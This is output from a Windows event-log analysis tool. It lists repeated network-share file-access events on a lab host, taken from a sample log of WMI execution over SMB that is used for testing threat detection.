2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
